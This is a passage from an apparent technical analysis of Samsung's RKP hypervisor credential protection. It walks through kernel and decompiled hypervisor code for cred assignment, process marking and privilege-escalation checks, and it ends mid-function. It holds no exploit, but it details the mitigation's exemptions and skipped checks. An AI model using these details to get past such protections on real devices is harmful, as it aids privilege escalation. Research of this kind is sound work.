static __latent_entropy struct task_struct *copy_process(
                    unsigned long clone_flags,
                    unsigned long stack_start,
                    unsigned long stack_size,
                    int __user *child_tidptr,
                    struct pid *pid,
                    int trace,
                    unsigned long tls,
                    int node)
{
  // ...
    if(rkp_cred_enable)
        rkp_assign_pgd(p);
  // ...
}

On the hypervisor side, the command is handled by rkp_cmd_pgd_assign, which simply calls rkp_pgd_assign.

rkp_pgd_assign calls rkp_phys_map_verify_cred to ensure the kernel-provided structure is a legitimate cred structure before writing the new value of the bp_pgd field of the cred structure.

void rkp_pgd_assign(saved_regs_t* regs) {
  // ...

  // Convert the VA of the cred structure into a PA.
  cred = rkp_get_pa(regs->x2);
  // The new PGD of the task is in register x3.
  pgd = regs->x3;
  // Verify that the credentials are valid and hypervisor-protected.
  if (rkp_phys_map_verify_cred(cred)) {
    uh_log('L', "rkp_kdp.c", 146, "rkp_pgd_assign !!  %lx %lx %lx", cred, regs->x2, pgd);
    return;
  }
  // Update the bp_pgd field of the cred structure if the check passed.
  *(cred + 8 * rkp_cred->CRED_BP_PGD_OFFSET) = pgd;
}

rkp_phys_map_verify_cred verifies that the pointer is aligned on the size of the cred structure and marked as CRED in the physmap.

int64_t rkp_phys_map_verify_cred(uint64_t cred) {
  // ...

  // The credentials pointer must not be NULL.
  if (!cred) {
    return 1;
  }
  // It must be aligned on its expected size.
  if (cred != cred / CRED_BUFF_SIZE * CRED_BUFF_SIZE) {
    return 1;
  }
  rkp_phys_map_lock(cred);
  // It must be marked as `CRED` in the physmap.
  if (!is_phys_map_cred(cred)) {
    uh_log('L', "rkp_kdp.c", 127, "physmap verification failed !!!!! %lx %lx %lx", cred, cred, cred);
    rkp_phys_map_unlock(cred);
    return 1;
  }
  rkp_phys_map_unlock(cred);
  return 0;
}

Security Change

Similarly to a change in the task PGD, the kernel also calls into the hypervisor to change the security field of a cred structure.

On the kernel side, this is the case when the cred structure is being freed by the selinux_cred_free function. It invokes the RKP_KDP_X45 command but also calls rkp_free_security to free the task_security_struct structure.

static void selinux_cred_free(struct cred *cred)
{
    // ...
    if (rkp_ro_page((unsigned long)cred)) {
        uh_call(UH_APP_RKP, RKP_KDP_X45, (u64) &cred->security, 7, 0, 0);
    }
    // ...
    rkp_free_security((unsigned long)tsec);
    // ...
}

rkp_free_security first calls chk_invalid_kern_ptr to check if the pointer given as an argument is a valid kernel pointer. It then calls rkp_ro_page and rkp_from_tsec_jar to ensure it was allocated from the hypervisor-protected cache, before calling kmem_cache_free (or kfree if it wasn't).

void rkp_free_security(unsigned long tsec)
{
    if(!tsec || 
        chk_invalid_kern_ptr(tsec))
        return;

    if(rkp_ro_page(tsec) && 
        rkp_from_tsec_jar(tsec)){
        kmem_cache_free(tsec_jar,(void *)tsec);
    }
    else { 
        kfree((void *)tsec);
    }
}

chk_invalid_kern_ptr checks if the pointer starts with 0xffffffc.

int chk_invalid_kern_ptr(u64 tsec) 
{
    return (((u64)tsec >> 36) != (u64)0xFFFFFFC);
}

rkp_ro_page calls rkp_is_pg_protected, unless the address to check is init_cred or init_sec.

static inline u8 rkp_ro_page(unsigned long addr)
{
    if(!rkp_cred_enable)
        return (u8)0;
    if((addr == ((unsigned long)&init_cred)) || 
        (addr == ((unsigned long)&init_sec)))
        return (u8)1;
    else
        return rkp_is_pg_protected(addr);
}

Finally, rkp_from_tsec_jar gets the head page of the object, then its slab cache, and returns whether it is the tsec_jar cache.

int rkp_from_tsec_jar(unsigned long addr)
{
    static void *objp;
    static struct kmem_cache *s;
    static struct page *page;

    objp = (void *)addr;

    if(!objp)
        return 0;

    page = virt_to_head_page(objp);
    s = page->slab_cache;
    if(s && s->name) {
        if(!strcmp(s->name,"tsec_jar")) {
            return 1;
        }
    }
    return 0;
}

On the hypervisor side, the command is handled by rkp_cmd_cred_set_security, which calls rkp_cred_set_security.

rkp_cred_set_security gets the cred structure from the pointer to its security field that was given as an argument. It ensures it is marked as CRED in the physmap before setting the security field to a poison value.

int64_t* rkp_cred_set_security(saved_regs_t* regs) {
  // ...

  // Get the beginning of the cred structure from the pointer to its security field, and convert the VA into a PA.
  cred = rkp_get_pa(regs->x2 - 8 * rkp_cred->CRED_SECURITY_OFFSET);
  // Ensure the cred structure is marked as `CRED` in the physmap.
  if (!is_phys_map_cred(cred)) {
    return uh_log('L', "rkp_kdp.c", 146, "invalidate_security: invalid cred !!!!! %lx %lx %lx", regs->x2,
                  regs->x2 - 8 * CRED_SECURITY_OFFSET, CRED_SECURITY_OFFSET);
  }
  // Convert the VA of the security field to a PA.
  security = rkp_get_pa(regs->x2);
  // Set the security field to the poison value 7 (remember that we are freeing the cred structure).
  *security = 7;
  return security;
}

Process Marking

Before delving into the credentials change, we must first explain the hypervisor's process marking.

On the kernel side, it happens in the handler of the execve system call. It invokes the RKP_KDP_X4B command, giving it the path of the binary being executed, so that the hypervisor can mark or unmark the current process. In addition, if the current task is root, as checked with the CHECK_ROOT_UID macro, and rkp_restrict_fork denies the execution of the binary, the system call returns immediately with -EACCES.

SYSCALL_DEFINE3(execve,
        const char __user *, filename,
        const char __user *const __user *, argv,
        const char __user *const __user *, envp)
{
    struct filename *path = getname(filename);
    int error = PTR_ERR(path);

    if(IS_ERR(path))
        return error;

    if(rkp_cred_enable){
        uh_call(UH_APP_RKP, RKP_KDP_X4B, (u64)path->name, 0, 0, 0);
    }

    if(CHECK_ROOT_UID(current) && rkp_cred_enable) {
        if(rkp_restrict_fork(path)){
            pr_warn("RKP_KDP Restricted making process. PID = %d(%s) "
                            "PPID = %d(%s)\n",
            current->pid, current->comm,
            current->parent->pid, current->parent->comm);
            putname(path);
            return -EACCES;
        }
    }
    putname(path);
  return do_execve(getname(filename), argv, envp);
}

The CHECK_ROOT_UID macro returns true if any of the UID, GID, EUID, EGID, SUID, or SGID of the task is zero.

#define CHECK_ROOT_UID(x) (x->cred->uid.val == 0 || x->cred->gid.val == 0 || \
            x->cred->euid.val == 0 || x->cred->egid.val == 0 || \
            x->cred->suid.val == 0 || x->cred->sgid.val == 0)

The rkp_restrict_fork function ignores the /system/bin/patchoat and /system/bin/idmap2 binaries. It also ignores processes marked as "Linux on Dex", as checked by the rkp_is_lod macro. For processes marked as "non root", checked by the rkp_is_nonroot macro, the credentials are changed to the shell user credentials (that is, UID and GID 2000).

static int rkp_restrict_fork(struct filename *path)
{
    struct cred *shellcred;

    if (!strcmp(path->name, "/system/bin/patchoat") ||
        !strcmp(path->name, "/system/bin/idmap2")) {
        return 0;
    }
        /* If the Process is from Linux on Dex, 
        then no need to reduce privilege */
#ifdef CONFIG_LOD_SEC
    if(rkp_is_lod(current)){
            return 0;
        }
#endif
    if(rkp_is_nonroot(current)){
        shellcred = prepare_creds();
        if (!shellcred) {
            return 1;
        }
        shellcred->uid.val = 2000;
        shellcred->gid.val = 2000;
        shellcred->euid.val = 2000;
        shellcred->egid.val = 2000;

        commit_creds(shellcred);
    }
    return 0;
}

The rkp_is_nonroot macro checks if bit 1 of the type field of the cred structure is set.

#define rkp_is_nonroot(x) ((x->cred->type)>>1 & 1)

The rkp_is_lod macro checks if bit 3 of the type field of the cred structure is set.

#define rkp_is_lod(x) ((x->cred->type)>>3 & 1)
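
For reference, the bit values of the type field can be summarized as follows (deduced from the kernel macros above and the hypervisor code below; the constant names are the ones used on the hypervisor side):

#define CRED_FLAG_CHILD_PPT  (1 << 1)  /* 2: checked by rkp_is_nonroot */
#define CRED_FLAG_MARK_PPT   (1 << 2)  /* 4: set for adbd and app_process32/64 */
#define CRED_FLAG_LOD        (1 << 3)  /* 8: checked by rkp_is_lod */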

Now we will take a look at the hypervisor side of the process marking to see when these two bits are set.

On the hypervisor side, the command in execve is handled by rkp_cmd_mark_ppt, which calls rkp_mark_ppt.

rkp_mark_ppt does some sanity checking on the current task_struct and its cred structure, and then changes the bits of the type field:

  • it sets CRED_FLAG_MARK_PPT (bit 2) for adbd, app_process32 and app_process64;
  • it sets CRED_FLAG_LOD (bit 3) for nst;
  • it unsets CRED_FLAG_CHILD_PPT (bit 1) for idmap2 and patchoat.

void rkp_mark_ppt(saved_regs_t* regs) {
  // ...

  // Get the current task_struct in the kernel.
  current_va = rkp_ns_get_current();
  // Convert the current task_struct VA into a PA.
  current_pa = rkp_get_pa(current_va);
  // Get the current cred structure from the current task_struct.
  current_cred = rkp_get_pa(*(current_pa + 8 * rkp_cred->TASK_CRED_OFFSET));
  // Get the binary path given as argument in register x2.
  name_va = regs->x2;
  // Convert the binary path VA into a PA.
  name_pa = rkp_get_pa(name_va);
  // Sanity-check: the values must be non NULL and the current cred must be marked as `CRED` in the physmap.
  if (!current_cred || !name_pa || rkp_phys_map_verify_cred(current_cred)) {
    uh_log('L', "rkp_kdp.c", 551, "rkp_mark_ppt NULL Cred OR filename %lx %lx %lx", current_cred, 0, 0);
  }
  // adbd, app_process32 and app_process64 are marked as `CRED_FLAG_MARK_PPT` (4).
  if (!strcmp(name_pa, "/system/bin/adbd") || !strcmp(name_pa, "/system/bin/app_process32") ||
      !strcmp(name_pa, "/system/bin/app_process64")) {
    *(current_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET) |= CRED_FLAG_MARK_PPT;
  }
  // nst is marked as `CRED_FLAG_LOD` (8, checked by `rkp_is_lod`).
  if (!strcmp(name_pa, "/system/bin/nst")) {
    *(current_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET) |= CRED_FLAG_LOD;
  }
  // idmap2 is unmarked as `CRED_FLAG_CHILD_PPT` (2, checked by `rkp_is_nonroot`).
  if (!strcmp(name_pa, "/system/bin/idmap2")) {
    *(current_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET) &= ~CRED_FLAG_CHILD_PPT;
  }
  // patchoat is unmarked as `CRED_FLAG_CHILD_PPT` (2, checked by `rkp_is_nonroot`).
  if (!strcmp(name_pa, "/system/bin/patchoat")) {
    *(current_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET) &= ~CRED_FLAG_CHILD_PPT;
  }
}

Credentials Change

When the kernel needs to change the credentials of a task, it calls into the hypervisor, which does some extensive checking to detect privilege escalation attempts. Before digging into the hypervisor side, let's see how a cred structure is assigned to a task_struct.

cred structures are allocated from three places. The first one is the copy_creds function. In addition to a comment stating the credentials are no longer shared among the same thread group, we can see that the return value of the prepare_ro_creds function is assigned to the cred field of the task_struct.

int copy_creds(struct task_struct *p, unsigned long clone_flags)
{
    // ...
    /*
     * Disabling cred sharing among the same thread group. This
     * is needed because we only added one back pointer in cred.
     *
     * This should NOT in any way change kernel logic, if we think about what
     * happens when a thread needs to change its credentials: it will just
     * create a new one, while all other threads in the same thread group still
     * reference the old one, whose reference counter decreases by 2.
     */
    // ...
    if(rkp_cred_enable){
        p->cred = p->real_cred = prepare_ro_creds(new, RKP_CMD_COPY_CREDS, (u64)p);
        put_cred(new);
    }
    // ...
}

The second place is the commit_creds function. If the new credentials are protected by the hypervisor (checked by calling rkp_ro_page), it verifies their usage counter, before assigning the return value of the prepare_ro_creds function to the cred and real_cred fields of the current task_struct.

int commit_creds(struct cred *new)
{

    if (rkp_ro_page((unsigned long)new))
        BUG_ON((rocred_uc_read(new)) < 1);
    else
        // ...
    if(rkp_cred_enable) {
        struct cred *new_ro;

        new_ro = prepare_ro_creds(new, RKP_CMD_CMMIT_CREDS, 0);

        rcu_assign_pointer(task->real_cred, new_ro);
        rcu_assign_pointer(task->cred, new_ro);
    } 
    else {
        // ...
    }
  // ...
    if (rkp_cred_enable){
        put_cred(new);
        put_cred(new);
    }
  // ...
}

The third place is the override_creds function. Yet again, we can see another call to prepare_ro_creds before assigning the return value to the cred field of the current task_struct.

#define override_creds(x) rkp_override_creds(&x)
const struct cred *rkp_override_creds(struct cred **cnew)
{
    // ...
    struct cred *new = *cnew;
    // ...
    if(rkp_cred_enable) {
        volatile unsigned int rkp_use_count = rkp_get_usecount(new);
        struct cred *new_ro;

        new_ro = prepare_ro_creds(new, RKP_CMD_OVRD_CREDS, rkp_use_count);
        *cnew = new_ro;
        rcu_assign_pointer(current->cred, new_ro);
        put_cred(new);
    }
    else {
        // ...
    }
    // ...
}

prepare_ro_creds allocates a new read-only cred structure from the cred_jar_ro cache. We have seen in the Credentials Protection section that new fields have been added to this structure. In particular, the use_cnt field, the reference count for the cred structure, needs to be modified often. To work around that, a pointer to a read-write structure containing the reference count is stored in the read-only cred structure. prepare_ro_creds thus also allocates a new read-write reference count. It then allocates a new read-only task_security_struct from the tsec_jar.

It uses the rkp_cred_fill_params macro and invokes the RKP_KDP_X46 command to let the hypervisor perform its verifications and copy the data from the read-write version of the cred structure (the argument) to the read-only one (the newly allocated one). It finally does some sanity-checking, depending on where prepare_ro_creds was called from, before returning the read-only version of the cred structure.

static struct cred *prepare_ro_creds(struct cred *old, int kdp_cmd, u64 p)
{
    u64 pgd =(u64)(current->mm?current->mm->pgd:swapper_pg_dir);
    struct cred *new_ro;
    void *use_cnt_ptr = NULL;
    void *rcu_ptr = NULL;
    void *tsec = NULL;
    cred_param_t cred_param;
    new_ro = kmem_cache_alloc(cred_jar_ro, GFP_KERNEL);
    if (!new_ro)
        panic("[%d] : kmem_cache_alloc() failed", kdp_cmd);

    use_cnt_ptr = kmem_cache_alloc(usecnt_jar,GFP_KERNEL);
    if (!use_cnt_ptr)
        panic("[%d] : Unable to allocate usage pointer\n", kdp_cmd);

    rcu_ptr = get_usecnt_rcu(use_cnt_ptr);
    ((struct ro_rcu_head*)rcu_ptr)->bp_cred = (void *)new_ro;

    tsec = kmem_cache_alloc(tsec_jar, GFP_KERNEL);
    if (!tsec)
        panic("[%d] : Unable to allocate security pointer\n", kdp_cmd);

    rkp_cred_fill_params(old,new_ro,use_cnt_ptr,tsec,kdp_cmd,p);
    uh_call(UH_APP_RKP, RKP_KDP_X46, (u64)&cred_param, 0, 0, 0);
    if (kdp_cmd == RKP_CMD_COPY_CREDS) {
        if ((new_ro->bp_task != (void *)p) 
            || new_ro->security != tsec 
            || new_ro->use_cnt != use_cnt_ptr) {
            panic("[%d]: RKP Call failed task=#%p:%p#, sec=#%p:%p#, usecnt=#%p:%p#", kdp_cmd, new_ro->bp_task,(void *)p,new_ro->security,tsec,new_ro->use_cnt,use_cnt_ptr);
        }
    }
    else {
        if ((new_ro->bp_task != current)||
            (current->mm 
            && new_ro->bp_pgd != (void *)pgd) ||
            (new_ro->security != tsec) ||
            (new_ro->use_cnt != use_cnt_ptr)) {
            panic("[%d]: RKP Call failed task=#%p:%p#, sec=#%p:%p#, usecnt=#%p:%p#, pgd=#%p:%p#", kdp_cmd, new_ro->bp_task,current,new_ro->security,tsec,new_ro->use_cnt,use_cnt_ptr,new_ro->bp_pgd,(void *)pgd);
        }
    }

    rocred_uc_set(new_ro, 2);

    set_cred_subscribers(new_ro, 0);
    get_group_info(new_ro->group_info);
    get_uid(new_ro->user);
    get_user_ns(new_ro->user_ns);

#ifdef CONFIG_KEYS
    key_get(new_ro->session_keyring);
    key_get(new_ro->process_keyring);
    key_get(new_ro->thread_keyring);
    key_get(new_ro->request_key_auth);
#endif

    validate_creds(new_ro);
    return new_ro;
}

The rkp_cred_fill_params macro simply fills the fields of the cred_param_t structure given as an argument to the RKP command.

typedef struct cred_param{
    struct cred *cred;
    struct cred *cred_ro;
    void *use_cnt_ptr;
    void *sec_ptr;
    unsigned long type;
    union {
        void *task_ptr;
        u64 use_cnt;
    };
}cred_param_t;
#define rkp_cred_fill_params(crd,crd_ro,uptr,tsec,rkp_cmd_type,rkp_use_cnt) \
do {                        \
    cred_param.cred = crd;      \
    cred_param.cred_ro = crd_ro;        \
    cred_param.use_cnt_ptr = uptr;      \
    cred_param.sec_ptr= tsec;       \
    cred_param.type = rkp_cmd_type;     \
    cred_param.use_cnt = (u64)rkp_use_cnt;      \
} while(0)

On the hypervisor side, the command is handled by the rkp_cmd_assign_creds function, which calls rkp_assign_creds.

rkp_assign_creds does a lot of checks that can be summarized as follows (where "current" refers to the cred of the current task, "old" refers to the read-write cred, and "new" refers to the read-only cred structure):

  • the current back-pointers integrity is checked;
  • the old cred structure must be protected by the hypervisor;
  • for non "Linux on Dex" current tasks,
    • if its IDs are not LOD prefixed and the device is locked, rkp_check_pe and from_zyg_adbd are called to detect privilege escalation;
    • if its IDs are LOD prefixed, the current task is marked as CRED_FLAG_LOD;
  • check_privilege_escalation is called for each UID, EUID, GID, and EGID pair of the old and current tasks to detect privilege escalation;
  • the old cred is copied into the new cred structure, and its use_cnt field is set;
  • for non copy_creds callers, the back-pointers of the new cred structure are set from the current task;
  • for the override_creds caller, the new cred structure is marked CRED_FLAG_ORPHAN if the usage count given as argument is greater than 1, and unmarked otherwise;
  • for the copy_creds caller, the back-pointer is set from the task being copied;
  • the new task_security_struct must be protected by the hypervisor;
  • if RKP is deferred initialized, the SID cannot jump from below sysctl_net (20) to above it;
  • the old task_security_struct is copied into the new task_security_struct, and the back-pointers are set accordingly;
  • if the device is locked and the current parent task is marked CRED_FLAG_MARK_PPT, the new task is marked CRED_FLAG_CHILD_PPT.

void rkp_assign_creds(saved_regs_t* regs) {
  // ...

  // Convert the VA of the argument structure to a PA.
  cred_param = rkp_get_pa(regs->x2);
  if (!cred_param) {
    uh_log('L', "rkp_kdp.c", 662, "NULL pData");
    return;
  }
  // Get the current task_struct in the kernel.
  curr_task_va = rkp_ns_get_current();
  // Convert the current task_struct VA into a PA.
  curr_task = rkp_get_pa(curr_task_va);
  // Get the current cred structure from the current task_struct.
  curr_cred_va = *(curr_task + 8 * rkp_cred->TASK_CRED_OFFSET);
  // Convert the current cred structure VA into a PA.
  curr_cred = rkp_get_pa(curr_cred_va);
  // Get the target RW cred from the argument structure and convert it from a VA to a PA.
  targ_cred = rkp_get_pa(cred_param->cred);
  // Get the target RO cred from the argument structure and convert it from a VA to a PA.
  targ_cred_ro = rkp_get_pa(cred_param->cred_ro);
  // Get the current task_security_struct from the current cred structure.
  curr_secptr_va = *(curr_cred + 8 * rkp_cred->CRED_SECURITY_OFFSET);
  // Convert the current task_security_struct from a VA to a PA.
  curr_secptr = rkp_get_pa(curr_secptr_va);
  // Sanity-check: the current cred structure must be non NULL.
  if (!curr_cred) {
    uh_log('L', "rkp_kdp.c", 489, "\nCurrent Cred is NULL %lx %lx %lx\n ", curr_task, curr_task_va, 0);
    return rkp_policy_violation("Data Protection Violation %lx %lx %lx", curr_task_va, curr_task, 0);
  }
  // Sanity-check: the current task_security_struct must be non NULL, or RKP must not be deferred initialized.
  if (!curr_secptr && rkp_deferred_inited) {
    uh_log('L', "rkp_kdp.c", 495, "\nCurrent sec_ptr is NULL  %lx %lx %lx\n ", curr_task, curr_task_va, curr_cred);
    return rkp_policy_violation("Data Protection Violation %lx %lx %lx", curr_task_va, curr_cred, 0);
  }
  // Get the back-pointer (a cred structure pointer) of the current task_security_struct.
  bp_cred_va = *(curr_secptr + 8 * rkp_cred->SEC_BP_CRED_OFFSET);
  // Get the back-pointer (a task_struct pointer) of the current cred structure.
  bp_task_va = *(curr_cred + 8 * rkp_cred->CRED_BP_TASK_OFFSET);
  // Sanity-check: the back-pointers must point to the current cred structure and current task_struct respectively.
  if (bp_cred_va != curr_cred_va || bp_task_va != curr_task_va) {
    uh_log('L', "rkp_kdp.c", 502, "\n Integrity Check failed_1  %lx %lx %lx\n ", bp_cred_va, curr_cred_va, curr_cred);
    uh_log('L', "rkp_kdp.c", 503, "\n Integrity Check failed_2 %lx %lx %lx\n ", bp_task_va, curr_task_va, curr_task);
    rkp_policy_violation("KDP Privilege Escalation %lx %lx %lx", bp_cred_va, curr_cred_va, curr_secptr);
    return;
  }
  // Sanity-check: the target RW and RO cred structures must be non NULL and the target RO cred structure must be marked
  // as `CRED` in the physmap.
  if (!targ_cred || !targ_cred_ro || rkp_phys_map_verify_cred(targ_cred_ro)) {
    uh_log('L', "rkp_kdp.c", 699, "rkp_assign_creds !! %lx %lx", targ_cred_ro, targ_cred);
    return;
  }
  skip_checks = 0;
  // Get the type field (used to process marking) from the current cred structure.
  curr_flags = *(curr_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET);
  // If the current task is not a "Linux on Dex" process.
  if ((curr_flags & CRED_FLAG_LOD) == 0) {
    // Get the uid, euid, gid, egid fields from the current cred structure.
    curr_uid = *(curr_cred + 4 * rkp_cred->CRED_UID_OFFSET);
    curr_euid = *(curr_cred + 4 * rkp_cred->CRED_EUID_OFFSET);
    curr_gid = *(curr_cred + 4 * rkp_cred->CRED_GID_OFFSET);
    curr_egid = *(curr_cred + 4 * rkp_cred->CRED_EGID_OFFSET);
    // If none of those fields have the LOD prefix (0x61a8).
    if ((curr_uid & 0xffff0000) != 0x61a80000 && (curr_euid & 0xffff0000) != 0x61a80000 &&
        (curr_gid & 0xffff0000) != 0x61a80000 && (curr_egid & 0xffff0000) != 0x61a80000) {
      // And if the device is locked.
      if (!rkp_cred->VERIFIED_BOOT_STATE) {
        // Call `rkp_check_pe` and `from_zyg_adbd` to detect instances of privilege escalation.
        if (rkp_check_pe(targ_cred, curr_cred) && from_zyg_adbd(curr_task, curr_cred)) {
          uh_log('L', "rkp_kdp.c", 717, "Priv Escalation! %lx %lx %lx", targ_cred,
                 *(targ_cred + 8 * rkp_cred->CRED_EUID_OFFSET), *(curr_cred + 8 * rkp_cred->CRED_EUID_OFFSET));
          // If either of these 2 functions returned true, call `rkp_privilege_escalation` to handle it.
          return rkp_privilege_escalation(targ_cred, curr_cred, 1);
        }
      }
      // If the device is unlocked, or no privilege escalation was detected, skip the next checks.
      skip_checks = 1;
    }
    // If the current task has a LOD prefixed field, mark it as `CRED_FLAG_LOD`.
    else {
      *(curr_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET) = curr_flags | CRED_FLAG_LOD;
    }
  }
  // If the checks are not skipped.
  if (!skip_checks) {
    // Get the uid field of the target RW cred structure.
    targ_uid = *(targ_cred + 4 * rkp_cred->CRED_UID_OFFSET);
    priv_esc = 0;
    // If the uid is not INET (3003).
    if (targ_uid != 3003) {
      // Get the uid field of the current cred structure.
      curr_uid = *(curr_cred + 4 * rkp_cred->CRED_UID_OFFSET);
      priv_esc = 0;
      // Call `check_privilege_escalation` to detect privilege escalation.
      if (check_privilege_escalation(targ_uid, curr_uid)) {
        uh_log('L', "rkp_kdp.c", 382, "\n LOD: uid privilege escalation curr_uid = %ld targ_uid = %ld \n", curr_uid,
               targ_uid);
        // If the function returns true, privilege escalation was detected.
        priv_esc = 1;
      }
    }
    // Get the euid field of the target RW cred structure.
    targ_euid = *(targ_cred + 4 * rkp_cred->CRED_EUID_OFFSET);
    // If the euid is not INET (3003).
    if (targ_euid != 3003) {
      // Get the euid field of the current cred structure.
      curr_euid = *(curr_cred + 4 * rkp_cred->CRED_EUID_OFFSET);
      // Call `check_privilege_escalation` to detect privilege escalation.
      if (check_privilege_escalation(targ_euid, curr_euid)) {
        uh_log('L', "rkp_kdp.c", 387, "\n LOD: euid privilege escalation curr_euid = %ld targ_euid = %ld \n", curr_euid,
               targ_euid);
        // If the function returns true, privilege escalation was detected.
        priv_esc = 1;
      }
    }
    // Get the gid field of the target RW cred structure.
    targ_gid = *(targ_cred + 4 * rkp_cred->CRED_GID_OFFSET);
    // If the gid is not INET (3003).
    if (targ_gid != 3003) {
      // Get the gid field of the current cred structure.
      curr_gid = *(curr_cred + 4 * rkp_cred->CRED_GID_OFFSET);
      // Call `check_privilege_escalation` to detect privilege escalation.
      if (check_privilege_escalation(targ_gid, curr_gid)) {
        uh_log('L', "rkp_kdp.c", 392, "\n LOD: Gid privilege escalation curr_gid = %ld targ_gid = %ld \n", curr_gid,
               targ_gid);
        // If the function returns true, privilege escalation was detected.
        priv_esc = 1;
      }
    }
    // Get the egid field of the target RW cred structure.
    targ_egid = *(targ_cred + 4 * rkp_cred->CRED_EGID_OFFSET);
    // If the egid is not INET (3003).
    if (targ_egid != 3003) {
      // Get the egid field of the current cred structure.
      curr_egid = *(curr_cred + 4 * rkp_cred->CRED_EGID_OFFSET);
      // Call `check_privilege_escalation` to detect privilege escalation.
      if (check_privilege_escalation(targ_egid, curr_egid)) {
        uh_log('L', "rkp_kdp.c", 397, "\n LOD: egid privilege escalation curr_egid = %ld targ_egid = %ld \n", curr_egid,
               targ_egid);
        // If the function returns true, privilege escalation was detected.
        priv_esc = 1;
      }
    }
    // If privilege escalation was detected on the UID, EUID, GID or EGID.
    if (priv_esc) {
      uh_log('L', "rkp_kdp.c", 705, "Linux on Dex Priv Escalation! %lx  ", targ_cred);
      if (curr_task) {
        curr_comm = curr_task + 8 * rkp_cred->TASK_COMM_OFFSET;
        uh_log('L', "rkp_kdp.c", 707, curr_comm);
      }
      // Call `rkp_privilege_escalation` to handle it.
      return rkp_privilege_escalation(targ_cred, curr_cred, 1);
    }
  }
  // The checks passed, copy the RW cred into the RO cred structure.
  memcpy(targ_cred_ro, targ_cred, rkp_cred->CRED_SIZE);
  cmd_type = cred_param->type;
  // Set the use_cnt field of the RO cred structure.
  *(targ_cred_ro + 8 * rkp_cred->CRED_USE_CNT) = cred_param->use_cnt_ptr;
  // If the caller of `prepare_ro_creds` was not `copy_creds`.
  if (cmd_type != RKP_CMD_COPY_CREDS) {
    // Get the current mm_struct from the current task_struct.
    curr_mm_va = *(curr_task + 8 * rkp_cred->TASK_MM_OFFSET);
    // If the current mm_struct is not NULL.
    if (curr_mm_va) {
      curr_mm = rkp_get_pa(curr_mm_va);
      // Extract the current PGD from it.
      curr_pgd_va = *(curr_mm + 8 * rkp_cred->MM_PGD_OFFSET);
    } else {
      // Otherwise, get it from TTBR1_EL1.
      curr_pgd_va = rkp_get_va(get_ttbr1_el1() & 0xffffffffc000);
    }
    // Set the bp_pgd and bp_task fields of the RO cred structure.
    *(targ_cred_ro + 8 * rkp_cred->CRED_BP_PGD_OFFSET) = curr_pgd_va;
    *(targ_cred_ro + 8 * rkp_cred->CRED_BP_TASK_OFFSET) = curr_task_va;
    // If the caller of `prepare_ro_creds` is `override_creds`.
    if (cmd_type == RKP_CMD_OVRD_CREDS) {
      // If the argument structure usage counter is lower or equal to 1, unmark the target RO cred as
      // `CRED_FLAG_ORPHAN`.
      if (cred_param->use_cnt <= 1) {
        *(targ_cred_ro + 8 * rkp_cred->CRED_FLAGS_OFFSET) &= ~CRED_FLAG_ORPHAN;
      }
      // Otherwise, mark the target RO cred as `CRED_FLAG_ORPHAN`.
      else {
        *(targ_cred_ro + 8 * rkp_cred->CRED_FLAGS_OFFSET) |= CRED_FLAG_ORPHAN;
      }
    }
  }
  // If the caller of `prepare_ro_creds` is `copy_creds`, set the bp_task field of the RO cred structure to the
  // task_struct given in the argument structure.
  else {
    *(targ_cred_ro + 8 * rkp_cred->CRED_BP_TASK_OFFSET) = cred_param->task_ptr;
  }
  // Get the new task_security_struct from the argument structure.
  newsec_ptr_va = cred_param->sec_ptr;
  // Get the target RO cred structure from the argument structure.
  targ_cred_ro_va = cred_param->cred_ro;
  // If the new task_security_struct is not NULL.
  if (newsec_ptr_va) {
    // Convert the new task_security_struct from a VA to a PA.
    newsec_ptr = rkp_get_pa(newsec_ptr_va);
    // Get the old task_security_struct from the target RW cred structure.
    oldsec_ptr_va = *(targ_cred + 8 * rkp_cred->CRED_SECURITY_OFFSET);
    // Convert the old task_security_struct from a VA to a PA.
    oldsec_ptr = rkp_get_pa(oldsec_ptr_va);
    // Call `chk_invalid_sec_ptr` to check if the new task_security_struct is hypervisor-protected, and ensure both the
    // old and the new task_security_struct are non NULL.
    if (chk_invalid_sec_ptr(newsec_ptr) || !oldsec_ptr || !newsec_ptr) {
      uh_log('L', "rkp_kdp.c", 594, "Invalid sec pointer [assign_secptr] %lx %lx %lx", newsec_ptr_va, newsec_ptr,
             oldsec_ptr);
      // Trigger a policy violation.
      rkp_policy_violation("Data Protection Violation %lx %lx %lx", newsec_ptr_va, oldsec_ptr, newsec_ptr);
    }
    // If the old and new task_security_struct are valid.
    else {
      // Get the new sid from the new task_security_struct.
      new_sid = *(newsec_ptr + 4);
      // Get the old sid from the old task_security_struct.
      old_sid = *(oldsec_ptr + 4);
      // If RKP is deferred initialized and the SID jumps from below to above `sysctl_net` (20).
      if (rkp_deferred_inited && old_sid < 20 && new_sid > 20) {
        uh_log('L', "rkp_kdp.c", 607, "Selinux Priv Escalation !! [assign_secptr] %lx %lx ", old_sid, new_sid);
        // Trigger a policy violation.
        rkp_policy_violation("Data Protection Violation %lx %lx %lx", old_sid, new_sid, 0);
      } else {
        // Copy the old task_security_struct to the new one.
        memcpy(newsec_ptr, oldsec_ptr, rkp_cred->SP_SIZE);
        // Set the security field of the target RO cred structure to the new task_security_struct.
        *(targ_cred_ro + 8 * rkp_cred->CRED_SECURITY_OFFSET) = newsec_ptr_va;
        // Set the bp_cred field of the new task_security_struct to the target RO cred structure.
        *(newsec_ptr + 8 * rkp_cred->SEC_BP_CRED_OFFSET) = targ_cred_ro_va;
      }
    }
  }
  // If the new task_security_struct is NULL, trigger a policy violation.
  else {
    uh_log('L', "rkp_kdp.c", 583, "Security Pointer is NULL [assign_secptr] %lx", 0);
    rkp_policy_violation("Data Protection Violation", 0, 0, 0);
  }
  // If the device is unlocked, return immediately.
  if (rkp_cred->VERIFIED_BOOT_STATE) {
    return;
  }
  // Get the type field from the RO cred structure.
  targ_flags = *(targ_cred_ro + 8 * rkp_cred->CRED_FLAGS_OFFSET);
  // If the target RO cred has the `CRED_FLAG_MARK_PPT` bit set.
  if ((targ_flags & CRED_FLAG_MARK_PPT) != 0) {
    // Get the parent task_struct of the current task_struct.
    parent_task_va = *(curr_task + 8 * rkp_cred->TASK_PARENT_OFFSET);
    // Convert the parent task_struct from a VA to a PA.
    parent_task = rkp_get_pa(parent_task_va);
    // Get the parent cred structure from the parent task_struct.
